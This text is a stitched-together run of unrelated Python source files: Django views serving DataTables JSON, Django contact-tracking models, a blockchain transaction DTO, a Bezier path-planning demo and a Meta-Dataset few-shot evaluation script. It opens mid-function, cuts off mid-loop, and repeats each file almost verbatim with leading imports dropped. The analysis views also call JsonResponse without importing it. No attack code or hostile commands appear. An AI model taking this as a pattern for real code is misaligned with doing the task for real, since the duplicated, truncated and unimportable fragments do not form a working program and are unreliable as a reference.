    df['involved_works'] = df.groupby('related_person')['related_person']\
        .transform('count')
    df['grouped_by_works'] = df.groupby('involved_works')['involved_works'].transform('count')
    df['grouped_by_works'] = (df['grouped_by_works'] / df['involved_works'])
    # The original computed this identical column twice; once suffices.
    df['duration'] = df.apply(lambda row: calculate_duration(row), axis=1)
    payload = {}
    df = df.drop(columns=['id', 'related_work', 'related_person'])
    payload['data'] = df.values.tolist()
    payload['columns'] = list(df)
    return JsonResponse(payload)
@method_decorator(login_required, name='dispatch')
class WorkAnalyze(TemplateView):
    # Login-protected page hosting the analysis tables; the table data is
    # fetched separately through the get_datatables_data* JSON endpoints.
    template_name = "analyze/basic.html"
from collections import Counter
import pandas as pd
import json
from datetime import date, timedelta
from django.contrib.auth.decorators import login_required
from django.utils.decorators import method_decorator
from django.urls import reverse
from django.db.models import Avg, Sum, Count
from django.shortcuts import render
from django.views.generic import TemplateView
from relations.models import *
from entities.models import *
def make_href(row, entity='work', id='id', label=None):
    """Render an HTML anchor linking to the generic detail view of *entity*.

    :param row: mapping (e.g. a DataFrame row) holding pk and label values.
    :param entity: entity type used to resolve the detail URL.
    :param id: key in *row* under which the primary key is stored.
    :param label: optional key in *row* whose value becomes the link text;
        without it the literal 'link2object' is shown.
    :return: anchor tag string (NOTE(review): label text is not HTML-escaped
        -- confirm upstream values are trusted).
    """
    detail_url = reverse(
        'entities:generic_entities_detail_view',
        kwargs={'pk': row[id], 'entity': entity}
    )
    link_text = row[label] if label else 'link2object'
    return """<a href="{}" target='_blank'>{}</a>""".format(detail_url, link_text)
def calculate_duration(row):
    """Return the inclusive span between start_date and end_date as a string.

    A missing/empty date on either end yields the zero-duration string.
    """
    start, end = row['start_date'], row['end_date']
    if not (end and start):
        return pd.to_timedelta("0 days").__str__()
    # +1 day makes the range inclusive of both endpoints.
    return pd.to_timedelta((end - start) + timedelta(days=1)).__str__()
def get_datatables_data_orig(request):
    """returns basically the original excel sheet data

    Serializes every non-'Verfach' Work's stored excel_row JSON into a
    DataTables payload: {'data': row lists, 'columns': column names}.
    """
    # None (not -1) disables column-width truncation: -1 was deprecated in
    # pandas 1.0 and raises in pandas >= 2.0.
    pd.set_option('display.max_colwidth', None)
    works = Work.objects.exclude(kind__name__startswith='Verfach')
    rows = list(works.values('id', 'excel_row'))
    # Merge the parsed excel_row dict with the object's id into one flat dict.
    lines = [dict(json.loads(x['excel_row']), id=x['id']) for x in rows]
    df = pd.DataFrame(lines)
    df['Signatur'] = df.apply(
        lambda row: make_href(
            row, entity='work',
            id='id',
            label='Signatur'
        ), axis=1
    )
    payload = {}
    payload['data'] = df.values.tolist()
    payload['columns'] = list(df)
    return JsonResponse(payload)
def get_datatables_data(request):
    """Serialize PersonWork relations into a DataTables payload.

    Adds hyperlinked work/person names, per-work and per-person relation
    counts, grouping ratios, and an inclusive duration column.
    """
    # None (not -1) disables column-width truncation: -1 was deprecated in
    # pandas 1.0 and raises in pandas >= 2.0.
    pd.set_option('display.max_colwidth', None)
    # PersonWorkRelation
    queryset = list(
        PersonWork.objects.values(
            'id',
            'relation_type__name',
            'related_work__name',
            'related_work',
            'related_person__name',
            'related_person',
            'start_date',
            'end_date',
        )
    )
    df = pd.DataFrame(queryset)
    df['related_work__name'] = df.apply(
        lambda row: make_href(
            row, entity='work',
            id='related_work',
            label='related_work__name'
        ), axis=1
    )
    df['related_person__name'] = df.apply(
        lambda row: make_href(
            row, entity='person',
            id='related_person',
            label='related_person__name'
        ), axis=1
    )
    # How many relation rows each work has ...
    df['involved_pers'] = df.groupby('related_work__name')['related_work__name']\
        .transform('count')
    df['grouped_by_pers'] = df.groupby('involved_pers')['involved_pers'].transform('count')
    df['grouped_by_pers'] = (df['grouped_by_pers'] / df['involved_pers'])
    # ... and how many each person has.
    df['involved_works'] = df.groupby('related_person')['related_person']\
        .transform('count')
    df['grouped_by_works'] = df.groupby('involved_works')['involved_works'].transform('count')
    df['grouped_by_works'] = (df['grouped_by_works'] / df['involved_works'])
    # The original computed this identical column twice; once suffices.
    df['duration'] = df.apply(lambda row: calculate_duration(row), axis=1)
    payload = {}
    df = df.drop(columns=['id', 'related_work', 'related_person'])
    payload['data'] = df.values.tolist()
    payload['columns'] = list(df)
    return JsonResponse(payload)
@method_decorator(login_required, name='dispatch')
class WorkAnalyze(TemplateView):
    # Login-protected page hosting the analysis tables; the table data is
    # fetched separately through the get_datatables_data* JSON endpoints.
    template_name = "analyze/basic.html"
from django.db import models
from django.contrib.auth.models import User
"""
UserWrapper for user account
"""
class UserWrapper(models.Model):
    # Thin 1:1 wrapper around Django's auth User; the CRM models below hang
    # their ownership off this wrapper instead of User directly.
    user = models.OneToOneField(User, on_delete=models.CASCADE, null=True)
    def __str__(self):
        # NOTE(review): user is nullable, so this raises AttributeError for a
        # wrapper without a linked account -- confirm that cannot occur.
        return self.user.username
"""
Tag for contact (e.g. work contact, etc)
"""
class ContactTag(models.Model):
    # Free-form label (e.g. "work contact") scoped to one user.
    name = models.CharField(max_length=200, null=True)
    user_wrapper = models.ForeignKey(UserWrapper, null=True, on_delete=models.SET_NULL)
    def __str__(self):
        # NOTE(review): name is nullable; __str__ returning None is rejected
        # by Django -- confirm tags are always named.
        return self.name
"""
Contact (a person)
"""
class Contact(models.Model):
    """A person in the user's network."""
    name = models.CharField(max_length=300, null=True)
    description = models.CharField(max_length=1000, null=True, blank=True)
    organization = models.CharField(max_length=200, null=True, blank=True)
    date_created = models.DateTimeField(auto_now_add=True, null=True)
    contact_tags = models.ManyToManyField(ContactTag)
    # Default image file served when no picture was uploaded.
    profile_pic = models.ImageField(default="profile.png", null=True, blank=True)
    user_wrapper = models.ForeignKey(UserWrapper, null=True, on_delete=models.SET_NULL)
    def __str__(self):
        return self.name
"""
Method/Type of a contact point (email, etc)
"""
class ContactPointMethod(models.Model):
    """A channel for reaching contacts (e.g. email, phone, LinkedIn)."""
    name = models.CharField(max_length=300, null=True)
    description = models.CharField(max_length=1000, null=True, blank=True)
    link = models.CharField(max_length=1000, null=True, blank=True)
    # Typical turnaround time on this channel, in hours.
    hours_for_response = models.FloatField(null=True, blank=True)
    date_created = models.DateTimeField(auto_now_add=True, null=True)
    user_wrapper = models.ForeignKey(UserWrapper, null=True, on_delete=models.SET_NULL)
    def __str__(self):
        # The original line was corrupted ("return self.<EMAIL>", a syntax
        # error from source anonymization); display the method's name like
        # the sibling models do.
        return self.name
"""
Contact point specific to a contact
"""
class ContactPoint(models.Model):
    """One outreach attempt to a contact over a specific channel."""
    # Lifecycle states of the outreach attempt.
    STATUS = (
        ('None', 'None'),
        ('Sent', 'Sent'),
        ('Responded - reply', 'Responded - reply'),
        ('Responded - done', 'Responded - done'),
    )
    contact = models.ForeignKey(Contact, null=True, on_delete=models.SET_NULL)
    contact_point_method = models.ForeignKey(ContactPointMethod, null=True, on_delete=models.SET_NULL)
    date_created = models.DateTimeField(auto_now_add=True, null=True)
    status = models.CharField(max_length=100, null=True, choices=STATUS)
    link = models.CharField(max_length=1000, null=True, blank=True)
    notes = models.CharField(max_length=1000, null=True, blank=True)
    # Incremented each time this contact point is reused for outreach.
    times_used = models.IntegerField(default=0, null=True)
    def __str__(self):
        # NOTE(review): link is nullable/blank; __str__ may return None,
        # which Django rejects -- confirm link is always populated.
        return self.link
from django.contrib.auth.models import User
"""
UserWrapper for user account
"""
class UserWrapper(models.Model):
    # Thin 1:1 wrapper around Django's auth User; the CRM models below hang
    # their ownership off this wrapper instead of User directly.
    user = models.OneToOneField(User, on_delete=models.CASCADE, null=True)
    def __str__(self):
        # NOTE(review): user is nullable, so this raises AttributeError for a
        # wrapper without a linked account -- confirm that cannot occur.
        return self.user.username
"""
Tag for contact (e.g. work contact, etc)
"""
class ContactTag(models.Model):
    # Free-form label (e.g. "work contact") scoped to one user.
    name = models.CharField(max_length=200, null=True)
    user_wrapper = models.ForeignKey(UserWrapper, null=True, on_delete=models.SET_NULL)
    def __str__(self):
        # NOTE(review): name is nullable; __str__ returning None is rejected
        # by Django -- confirm tags are always named.
        return self.name
"""
Contact (a person)
"""
class Contact(models.Model):
    """A person in the user's network."""
    name = models.CharField(max_length=300, null=True)
    description = models.CharField(max_length=1000, null=True, blank=True)
    organization = models.CharField(max_length=200, null=True, blank=True)
    date_created = models.DateTimeField(auto_now_add=True, null=True)
    contact_tags = models.ManyToManyField(ContactTag)
    # Default image file served when no picture was uploaded.
    profile_pic = models.ImageField(default="profile.png", null=True, blank=True)
    user_wrapper = models.ForeignKey(UserWrapper, null=True, on_delete=models.SET_NULL)
    def __str__(self):
        return self.name
"""
Method/Type of a contact point (email, etc)
"""
class ContactPointMethod(models.Model):
    """A channel for reaching contacts (e.g. email, phone, LinkedIn)."""
    name = models.CharField(max_length=300, null=True)
    description = models.CharField(max_length=1000, null=True, blank=True)
    link = models.CharField(max_length=1000, null=True, blank=True)
    # Typical turnaround time on this channel, in hours.
    hours_for_response = models.FloatField(null=True, blank=True)
    date_created = models.DateTimeField(auto_now_add=True, null=True)
    user_wrapper = models.ForeignKey(UserWrapper, null=True, on_delete=models.SET_NULL)
    def __str__(self):
        # The original line was corrupted ("return self.<EMAIL>", a syntax
        # error from source anonymization); display the method's name like
        # the sibling models do.
        return self.name
"""
Contact point specific to a contact
"""
class ContactPoint(models.Model):
    """One outreach attempt to a contact over a specific channel."""
    # Lifecycle states of the outreach attempt.
    STATUS = (
        ('None', 'None'),
        ('Sent', 'Sent'),
        ('Responded - reply', 'Responded - reply'),
        ('Responded - done', 'Responded - done'),
    )
    contact = models.ForeignKey(Contact, null=True, on_delete=models.SET_NULL)
    contact_point_method = models.ForeignKey(ContactPointMethod, null=True, on_delete=models.SET_NULL)
    date_created = models.DateTimeField(auto_now_add=True, null=True)
    status = models.CharField(max_length=100, null=True, choices=STATUS)
    link = models.CharField(max_length=1000, null=True, blank=True)
    notes = models.CharField(max_length=1000, null=True, blank=True)
    # Incremented each time this contact point is reused for outreach.
    times_used = models.IntegerField(default=0, null=True)
    def __str__(self):
        # NOTE(review): link is nullable/blank; __str__ may return None,
        # which Django rejects -- confirm link is always populated.
        return self.link
from __future__ import annotations
import typing
from .signed_transaction import SignedTransaction
from ..account.address import Address
from ..blockchain.network_type import OptionalNetworkType
from ... import util
__all__ = ['SyncAnnounce']
@util.dataclass(frozen=True)
class SyncAnnounce(util.DTO):
    """
    Signed transaction to announce and sync.
    :param payload: Signed transaction data.
    :param hash: Transaction hash.
    :param address: Transaction address.
    """
    payload: str
    hash: str
    address: str
    def __init__(
        self,
        payload: typing.AnyStr,
        hash: typing.AnyStr,
        address: str,
    ) -> None:
        # Accept str or bytes; normalize both fields to hex strings.
        payload = util.encode_hex(payload)
        hash = util.encode_hex(hash)
        # 64 hex characters == 32 bytes, the expected hash length.
        if len(hash) != 64:
            raise ValueError('Transaction hash must be 64 characters long.')
        # _set is used because the dataclass is frozen (immutable).
        self._set('payload', payload)
        self._set('hash', hash)
        self._set('address', address)
    @classmethod
    def create(cls, transaction: SignedTransaction):
        """
        Create sync announce object from signed transaction data.
        :param transaction: Signed transaction data.
        """
        # Derive the announcing account's address from the signer public key.
        public_key = transaction.signer
        network_type = transaction.network_type
        address = Address.create_from_public_key(public_key, network_type)
        return cls(
            payload=transaction.payload, # type: ignore
            hash=transaction.hash, # type: ignore
            address=address.address,
        )
    @classmethod
    def validate_dto(cls, data: dict) -> bool:
        """Validate the data-transfer object."""
        required_keys = {'payload', 'hash', 'address'}
        # Presumably: all required keys present, and no keys beyond them --
        # confirm against util.DTO's validate_dto_required/validate_dto_all.
        return (
            cls.validate_dto_required(data, required_keys)
            and cls.validate_dto_all(data, required_keys)
        )
    def to_dto(
        self,
        network_type: OptionalNetworkType = None,
    ) -> dict:
        # Serialize to a plain dict; network_type is accepted for API
        # symmetry with other DTOs but unused here.
        return {
            'payload': self.payload,
            'hash': self.hash,
            'address': self.address,
        }
    @classmethod
    def create_from_dto(
        cls,
        data: dict,
        network_type: OptionalNetworkType = None,
    ):
        # Deserialize from a dict produced by to_dto; raises ValueError if
        # the dict does not match the expected schema.
        if not cls.validate_dto(data):
            raise ValueError('Invalid data-transfer object.')
        return cls(
            payload=data['payload'],
            hash=data['hash'],
            address=data['address'],
        )
import typing
from .signed_transaction import SignedTransaction
from ..account.address import Address
from ..blockchain.network_type import OptionalNetworkType
from ... import util
__all__ = ['SyncAnnounce']
@util.dataclass(frozen=True)
class SyncAnnounce(util.DTO):
    """
    Signed transaction to announce and sync.
    :param payload: Signed transaction data.
    :param hash: Transaction hash.
    :param address: Transaction address.
    """
    payload: str
    hash: str
    address: str
    def __init__(
        self,
        payload: typing.AnyStr,
        hash: typing.AnyStr,
        address: str,
    ) -> None:
        # Accept str or bytes; normalize both fields to hex strings.
        payload = util.encode_hex(payload)
        hash = util.encode_hex(hash)
        # 64 hex characters == 32 bytes, the expected hash length.
        if len(hash) != 64:
            raise ValueError('Transaction hash must be 64 characters long.')
        # _set is used because the dataclass is frozen (immutable).
        self._set('payload', payload)
        self._set('hash', hash)
        self._set('address', address)
    @classmethod
    def create(cls, transaction: SignedTransaction):
        """
        Create sync announce object from signed transaction data.
        :param transaction: Signed transaction data.
        """
        # Derive the announcing account's address from the signer public key.
        public_key = transaction.signer
        network_type = transaction.network_type
        address = Address.create_from_public_key(public_key, network_type)
        return cls(
            payload=transaction.payload, # type: ignore
            hash=transaction.hash, # type: ignore
            address=address.address,
        )
    @classmethod
    def validate_dto(cls, data: dict) -> bool:
        """Validate the data-transfer object."""
        required_keys = {'payload', 'hash', 'address'}
        # Presumably: all required keys present, and no keys beyond them --
        # confirm against util.DTO's validate_dto_required/validate_dto_all.
        return (
            cls.validate_dto_required(data, required_keys)
            and cls.validate_dto_all(data, required_keys)
        )
    def to_dto(
        self,
        network_type: OptionalNetworkType = None,
    ) -> dict:
        # Serialize to a plain dict; network_type is accepted for API
        # symmetry with other DTOs but unused here.
        return {
            'payload': self.payload,
            'hash': self.hash,
            'address': self.address,
        }
    @classmethod
    def create_from_dto(
        cls,
        data: dict,
        network_type: OptionalNetworkType = None,
    ):
        # Deserialize from a dict produced by to_dto; raises ValueError if
        # the dict does not match the expected schema.
        if not cls.validate_dto(data):
            raise ValueError('Invalid data-transfer object.')
        return cls(
            payload=data['payload'],
            hash=data['hash'],
            address=data['address'],
        )
import numpy as np
import matplotlib.pyplot as plt
from scipy.special import comb
import draw
def calc_4points_bezier_path(sx, sy, syaw, gx, gy, gyaw, offset):
    """Build a cubic Bezier path between two oriented poses.

    The inner control points lie along the start/goal headings at a
    distance of (start-to-goal distance) / offset.

    Returns (sampled path as an (n, 2) array, the 4 control points).
    """
    lever = np.hypot(sx - gx, sy - gy) / offset
    control_points = np.array([
        [sx, sy],
        [sx + lever * np.cos(syaw), sy + lever * np.sin(syaw)],
        [gx - lever * np.cos(gyaw), gy - lever * np.sin(gyaw)],
        [gx, gy],
    ])
    sampled = calc_bezier_path(control_points, n_points=100)
    return sampled, control_points
def calc_bezier_path(control_points, n_points=100):
    """Sample the Bezier curve defined by *control_points* at n_points
    evenly spaced parameter values in [0, 1]."""
    return np.array([bezier(t, control_points)
                     for t in np.linspace(0, 1, n_points)])
def Comb(n, i, t):
    """The i-th Bernstein basis polynomial of degree n evaluated at t."""
    binomial = comb(n, i)
    return binomial * (t ** i) * ((1 - t) ** (n - i))
def bezier(t, control_points):
    """Evaluate the Bezier curve at parameter t as the Bernstein-weighted
    sum of its control points."""
    degree = len(control_points) - 1
    weighted = [Comb(degree, i, t) * control_points[i]
                for i in range(degree + 1)]
    return np.sum(weighted, axis=0)
def bezier_derivatives_control_points(control_points, n_derivatives):
    """Control points of the curve's derivatives up to order n_derivatives.

    Returns a dict mapping derivative order k -> control-point array: the
    derivative of a Bezier with m control points has control points
    (m - 1) * (P[j+1] - P[j]).
    """
    w = {0: control_points}
    for order in range(n_derivatives):
        pts = w[order]
        count = len(pts)
        w[order + 1] = np.array([(count - 1) * (pts[j + 1] - pts[j])
                                 for j in range(count - 1)])
    return w
def curvature(dx, dy, ddx, ddy):
    """Signed curvature of a planar parametric curve from its first and
    second derivatives."""
    numerator = dx * ddy - dy * ddx
    denominator = (dx ** 2 + dy ** 2) ** (3 / 2)
    return numerator / denominator
def simulation():
    """Animated de Casteljau demo: repeatedly interpolates the control
    polygon to trace a cubic Bezier curve point by point."""
    sx = [-3, 0, 4, 6]
    sy = [2, 0, 1.5, 6]
    ratio = np.linspace(0, 1, 100)
    pathx, pathy = [], []
    for t in ratio:
        # First level: interpolate between consecutive control points.
        x, y = [], []
        for i in range(len(sx) - 1):
            x.append(sx[i + 1] * t + sx[i] * (1 - t))
            y.append(sy[i + 1] * t + sy[i] * (1 - t))
        # Second level: interpolate between the first-level points.
        xx, yy = [], []
        for i in range(len(x) - 1):
            xx.append(x[i + 1] * t + x[i] * (1 - t))
            yy.append(y[i + 1] * t + y[i] * (1 - t))
        # Third level yields the point on the curve at parameter t.
        px = xx[1] * t + xx[0] * (1 - t)
        py = yy[1] * t + yy[0] * (1 - t)
        pathx.append(px)
        pathy.append(py)
        # Redraw the whole frame for this t (animation via pause()).
        plt.cla()
        plt.plot(sx, sy, linestyle='-', marker='o', color='dimgray', label="Control Points")
        plt.plot(x, y, color='dodgerblue')
        plt.plot(xx, yy, color='cyan')
        plt.plot(pathx, pathy, color='darkorange', linewidth=2, label="Bezier Path")
        plt.plot(px, py, marker='o')
        plt.axis("equal")
        plt.legend()
        plt.title("Cubic Bezier Curve demo")
        plt.grid(True)
        plt.pause(0.001)
    plt.show()
def main():
    """Plot a 4-point Bezier path between two poses together with its
    tangent, normal, and osculating circle at t = 0.8."""
    sx, sy, syaw = 10.0, 1.0, np.deg2rad(180.0)
    gx, gy, gyaw = 0.0, -3.0, np.deg2rad(-45.0)
    offset = 3.0
    path, control_points = calc_4points_bezier_path(sx, sy, syaw, gx, gy, gyaw, offset)
    t = 0.8  # Number in [0, 1]
    x_target, y_target = bezier(t, control_points)
    derivatives_cp = bezier_derivatives_control_points(control_points, 2)
    point = bezier(t, control_points)
    dt = bezier(t, derivatives_cp[1])
    ddt = bezier(t, derivatives_cp[2])
    # Radius of curv
    radius = 1 / curvature(dt[0], dt[1], ddt[0], ddt[1])
    # Normalize derivative
    dt /= np.linalg.norm(dt, 2)
    tangent = np.array([point, point + dt])
    # Normal direction: tangent rotated 90 degrees counter-clockwise.
    normal = np.array([point, point + [- dt[1], dt[0]]])
    curvature_center = point + np.array([- dt[1], dt[0]]) * radius
    circle = plt.Circle(tuple(curvature_center), radius,
                        color=(0, 0.8, 0.8), fill=False, linewidth=1)
    # Sanity-check that the sampled path starts/ends exactly at the poses.
    assert path.T[0][0] == sx, "path is invalid"
    assert path.T[1][0] == sy, "path is invalid"
    assert path.T[0][-1] == gx, "path is invalid"
    assert path.T[1][-1] == gy, "path is invalid"
    fig, ax = plt.subplots()
    ax.plot(path.T[0], path.T[1], label="Bezier Path")
    ax.plot(control_points.T[0], control_points.T[1],
            '--o', label="Control Points")
    ax.plot(x_target, y_target)
    ax.plot(tangent[:, 0], tangent[:, 1], label="Tangent")
    ax.plot(normal[:, 0], normal[:, 1], label="Normal")
    ax.add_artist(circle)
    draw.Arrow(sx, sy, syaw, 1, "darkorange")
    draw.Arrow(gx, gy, gyaw, 1, "darkorange")
    plt.grid(True)
    plt.title("Bezier Path: from Atsushi's work")
    ax.axis("equal")
    plt.show()


if __name__ == '__main__':
    main()
    # simulation()
import matplotlib.pyplot as plt
from scipy.special import comb
import draw
def calc_4points_bezier_path(sx, sy, syaw, gx, gy, gyaw, offset):
    """Build a cubic Bezier path between two oriented poses.

    The inner control points lie along the start/goal headings at a
    distance of (start-to-goal distance) / offset.

    Returns (sampled path as an (n, 2) array, the 4 control points).
    """
    lever = np.hypot(sx - gx, sy - gy) / offset
    control_points = np.array([
        [sx, sy],
        [sx + lever * np.cos(syaw), sy + lever * np.sin(syaw)],
        [gx - lever * np.cos(gyaw), gy - lever * np.sin(gyaw)],
        [gx, gy],
    ])
    sampled = calc_bezier_path(control_points, n_points=100)
    return sampled, control_points
def calc_bezier_path(control_points, n_points=100):
    """Sample the Bezier curve defined by *control_points* at n_points
    evenly spaced parameter values in [0, 1]."""
    return np.array([bezier(t, control_points)
                     for t in np.linspace(0, 1, n_points)])
def Comb(n, i, t):
    """The i-th Bernstein basis polynomial of degree n evaluated at t."""
    binomial = comb(n, i)
    return binomial * (t ** i) * ((1 - t) ** (n - i))
def bezier(t, control_points):
    """Evaluate the Bezier curve at parameter t as the Bernstein-weighted
    sum of its control points."""
    degree = len(control_points) - 1
    weighted = [Comb(degree, i, t) * control_points[i]
                for i in range(degree + 1)]
    return np.sum(weighted, axis=0)
def bezier_derivatives_control_points(control_points, n_derivatives):
    """Control points of the curve's derivatives up to order n_derivatives.

    Returns a dict mapping derivative order k -> control-point array: the
    derivative of a Bezier with m control points has control points
    (m - 1) * (P[j+1] - P[j]).
    """
    w = {0: control_points}
    for order in range(n_derivatives):
        pts = w[order]
        count = len(pts)
        w[order + 1] = np.array([(count - 1) * (pts[j + 1] - pts[j])
                                 for j in range(count - 1)])
    return w
def curvature(dx, dy, ddx, ddy):
    """Signed curvature of a planar parametric curve from its first and
    second derivatives."""
    numerator = dx * ddy - dy * ddx
    denominator = (dx ** 2 + dy ** 2) ** (3 / 2)
    return numerator / denominator
def simulation():
    """Animated de Casteljau demo: repeatedly interpolates the control
    polygon to trace a cubic Bezier curve point by point."""
    sx = [-3, 0, 4, 6]
    sy = [2, 0, 1.5, 6]
    ratio = np.linspace(0, 1, 100)
    pathx, pathy = [], []
    for t in ratio:
        # First level: interpolate between consecutive control points.
        x, y = [], []
        for i in range(len(sx) - 1):
            x.append(sx[i + 1] * t + sx[i] * (1 - t))
            y.append(sy[i + 1] * t + sy[i] * (1 - t))
        # Second level: interpolate between the first-level points.
        xx, yy = [], []
        for i in range(len(x) - 1):
            xx.append(x[i + 1] * t + x[i] * (1 - t))
            yy.append(y[i + 1] * t + y[i] * (1 - t))
        # Third level yields the point on the curve at parameter t.
        px = xx[1] * t + xx[0] * (1 - t)
        py = yy[1] * t + yy[0] * (1 - t)
        pathx.append(px)
        pathy.append(py)
        # Redraw the whole frame for this t (animation via pause()).
        plt.cla()
        plt.plot(sx, sy, linestyle='-', marker='o', color='dimgray', label="Control Points")
        plt.plot(x, y, color='dodgerblue')
        plt.plot(xx, yy, color='cyan')
        plt.plot(pathx, pathy, color='darkorange', linewidth=2, label="Bezier Path")
        plt.plot(px, py, marker='o')
        plt.axis("equal")
        plt.legend()
        plt.title("Cubic Bezier Curve demo")
        plt.grid(True)
        plt.pause(0.001)
    plt.show()
def main():
    """Plot a 4-point Bezier path between two poses together with its
    tangent, normal, and osculating circle at t = 0.8."""
    sx, sy, syaw = 10.0, 1.0, np.deg2rad(180.0)
    gx, gy, gyaw = 0.0, -3.0, np.deg2rad(-45.0)
    offset = 3.0
    path, control_points = calc_4points_bezier_path(sx, sy, syaw, gx, gy, gyaw, offset)
    t = 0.8  # Number in [0, 1]
    x_target, y_target = bezier(t, control_points)
    derivatives_cp = bezier_derivatives_control_points(control_points, 2)
    point = bezier(t, control_points)
    dt = bezier(t, derivatives_cp[1])
    ddt = bezier(t, derivatives_cp[2])
    # Radius of curv
    radius = 1 / curvature(dt[0], dt[1], ddt[0], ddt[1])
    # Normalize derivative
    dt /= np.linalg.norm(dt, 2)
    tangent = np.array([point, point + dt])
    # Normal direction: tangent rotated 90 degrees counter-clockwise.
    normal = np.array([point, point + [- dt[1], dt[0]]])
    curvature_center = point + np.array([- dt[1], dt[0]]) * radius
    circle = plt.Circle(tuple(curvature_center), radius,
                        color=(0, 0.8, 0.8), fill=False, linewidth=1)
    # Sanity-check that the sampled path starts/ends exactly at the poses.
    assert path.T[0][0] == sx, "path is invalid"
    assert path.T[1][0] == sy, "path is invalid"
    assert path.T[0][-1] == gx, "path is invalid"
    assert path.T[1][-1] == gy, "path is invalid"
    fig, ax = plt.subplots()
    ax.plot(path.T[0], path.T[1], label="Bezier Path")
    ax.plot(control_points.T[0], control_points.T[1],
            '--o', label="Control Points")
    ax.plot(x_target, y_target)
    ax.plot(tangent[:, 0], tangent[:, 1], label="Tangent")
    ax.plot(normal[:, 0], normal[:, 1], label="Normal")
    ax.add_artist(circle)
    draw.Arrow(sx, sy, syaw, 1, "darkorange")
    draw.Arrow(gx, gy, gyaw, 1, "darkorange")
    plt.grid(True)
    plt.title("Bezier Path: from Atsushi's work")
    ax.axis("equal")
    plt.show()


if __name__ == '__main__':
    main()
    # simulation()
import os
import torch
import tensorflow as tf
import numpy as np
from tqdm import tqdm
from tabulate import tabulate
from utils import check_dir
from models.losses import prototype_loss, knn_loss, lr_loss, scm_loss, svm_loss
from models.model_utils import CheckPointer
from models.model_helpers import get_model
from models.pa import apply_selection, pa
from data.meta_dataset_reader import (MetaDatasetEpisodeReader, MetaDatasetBatchReader, TRAIN_METADATASET_NAMES,
ALL_METADATASET_NAMES)
from config import args
def main():
    """Evaluate a checkpointed feature extractor on all Meta-Dataset domains.

    For each of 600 test episodes per domain: embed support/query images,
    fit Pre-classifier Alignment (PA) selection parameters on the support
    set, score nearest-centroid classification (NCC) on the query set.
    Results are printed as a table and saved to disk.
    """
    TEST_SIZE = 600
    # Setting up datasets
    trainsets, valsets, testsets = args['data.train'], args['data.val'], args['data.test']
    testsets = ALL_METADATASET_NAMES  # comment this line to test the model on args['data.test']
    trainsets = TRAIN_METADATASET_NAMES
    test_loader = MetaDatasetEpisodeReader('test', trainsets, trainsets, testsets, test_type=args['test.type'])
    model = get_model(None, args)
    checkpointer = CheckPointer(args, model, optimizer=None)
    checkpointer.restore_model(ckpt='best', strict=False)
    model.eval()
    accs_names = ['NCC']
    var_accs = dict()
    config = tf.compat.v1.ConfigProto()
    config.gpu_options.allow_growth = False
    with tf.compat.v1.Session(config=config) as session:
        # go over each test domain
        for dataset in testsets:
            # Domains seen during training get a smaller PA learning rate.
            if dataset in TRAIN_METADATASET_NAMES:
                lr = 0.1
            else:
                lr = 1
            print(dataset)
            var_accs[dataset] = {name: [] for name in accs_names}
            for i in tqdm(range(TEST_SIZE)):
                # Embedding the episode needs no gradients; PA optimization
                # below manages its own gradient state.
                with torch.no_grad():
                    sample = test_loader.get_test_task(session, dataset)
                    context_features = model.embed(sample['context_images'])
                    target_features = model.embed(sample['target_images'])
                    context_labels = sample['context_labels']
                    target_labels = sample['target_labels']
                # optimize selection parameters and perform feature selection
                selection_params = pa(context_features, context_labels, max_iter=40, lr=lr, distance=args['test.distance'])
                selected_context = apply_selection(context_features, selection_params)
                selected_target = apply_selection(target_features, selection_params)
                _, stats_dict, _ = prototype_loss(
                    selected_context, context_labels,
                    selected_target, target_labels, distance=args['test.distance'])
                var_accs[dataset]['NCC'].append(stats_dict['acc'])
            dataset_acc = np.array(var_accs[dataset]['NCC']) * 100
            print(f"{dataset}: test_acc {dataset_acc.mean():.2f}%")
    # Print nice results table
    print('results of {}'.format(args['model.name']))
    rows = []
    for dataset_name in testsets:
        row = [dataset_name]
        for model_name in accs_names:
            acc = np.array(var_accs[dataset_name][model_name]) * 100
            mean_acc = acc.mean()
            # 95% confidence interval over the test episodes.
            conf = (1.96 * acc.std()) / np.sqrt(len(acc))
            row.append(f"{mean_acc:0.2f} +- {conf:0.2f}")
        rows.append(row)
    out_path = os.path.join(args['out.dir'], 'weights')
    out_path = check_dir(out_path, True)
    out_path = os.path.join(out_path, '{}-{}-{}-{}-test-results.npy'.format(args['model.name'], args['test.type'], 'pa', args['test.distance']))
    np.save(out_path, {'rows': rows})
    table = tabulate(rows, headers=['model \\ data'] + accs_names, floatfmt=".2f")
    print(table)
    print("\n")


if __name__ == '__main__':
    main()
import torch
import tensorflow as tf
import numpy as np
from tqdm import tqdm
from tabulate import tabulate
from utils import check_dir
from models.losses import prototype_loss, knn_loss, lr_loss, scm_loss, svm_loss
from models.model_utils import CheckPointer
from models.model_helpers import get_model
from models.pa import apply_selection, pa
from data.meta_dataset_reader import (MetaDatasetEpisodeReader, MetaDatasetBatchReader, TRAIN_METADATASET_NAMES,
ALL_METADATASET_NAMES)
from config import args
def main():
    """Evaluate a checkpointed feature extractor on all Meta-Dataset domains.

    For each of 600 test episodes per domain: embed support/query images,
    fit Pre-classifier Alignment (PA) selection parameters on the support
    set, score nearest-centroid classification (NCC) on the query set.
    Results are printed as a table and saved to disk.
    """
    TEST_SIZE = 600
    # Setting up datasets
    trainsets, valsets, testsets = args['data.train'], args['data.val'], args['data.test']
    testsets = ALL_METADATASET_NAMES  # comment this line to test the model on args['data.test']
    trainsets = TRAIN_METADATASET_NAMES
    test_loader = MetaDatasetEpisodeReader('test', trainsets, trainsets, testsets, test_type=args['test.type'])
    model = get_model(None, args)
    checkpointer = CheckPointer(args, model, optimizer=None)
    checkpointer.restore_model(ckpt='best', strict=False)
    model.eval()
    accs_names = ['NCC']
    var_accs = dict()
    config = tf.compat.v1.ConfigProto()
    config.gpu_options.allow_growth = False
    with tf.compat.v1.Session(config=config) as session:
        # go over each test domain
        for dataset in testsets:
            # Domains seen during training get a smaller PA learning rate.
            if dataset in TRAIN_METADATASET_NAMES:
                lr = 0.1
            else:
                lr = 1
            print(dataset)
            var_accs[dataset] = {name: [] for name in accs_names}
            for i in tqdm(range(TEST_SIZE)):
                # Embedding the episode needs no gradients; PA optimization
                # below manages its own gradient state.
                with torch.no_grad():
                    sample = test_loader.get_test_task(session, dataset)
                    context_features = model.embed(sample['context_images'])
                    target_features = model.embed(sample['target_images'])
                    context_labels = sample['context_labels']
                    target_labels = sample['target_labels']
                # optimize selection parameters and perform feature selection
                selection_params = pa(context_features, context_labels, max_iter=40, lr=lr, distance=args['test.distance'])
